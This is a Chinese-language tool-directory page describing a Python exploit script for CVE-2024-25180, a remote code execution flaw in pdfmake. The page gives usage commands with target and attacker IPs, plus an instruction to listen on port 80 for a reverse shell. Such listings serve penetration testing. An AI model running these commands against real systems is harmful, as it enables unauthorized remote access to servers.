Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-25180 — 针对CVE-2024-25180的Python利用脚本,该漏洞是pdfmake中的一个远程代码执行漏洞,通过精心构造的POST请求传递反向Shell。 | Kitploit
工具/GitHubGitHub/dustblessnotdust/cve-2024-25180
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用命令与控制远程访问工具
GitHubdustblessnotdust/cve-2024-25180

CVE-2024-25180

针对CVE-2024-25180的Python利用脚本,该漏洞是pdfmake中的一个远程代码执行漏洞,通过精心构造的POST请求传递反向Shell。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-25180

概述

pdfmake是一个纯 JavaScript 客户端/服务器端 PDF 打印 此软件包的受影响版本容易受到任意代码注入攻击,攻击者可以通过向路径发送精心设计的 POST 请求来执行任意代码/pdf。攻击者可以通过发送精心设计的请求在系统上执行任意代码。

CVE-2024-25180 Remote Code Execution in pdfmake

脚本利用

root@kitploit:~
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>

python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80

监听80端口,即可获取反弹shell

image

下载工具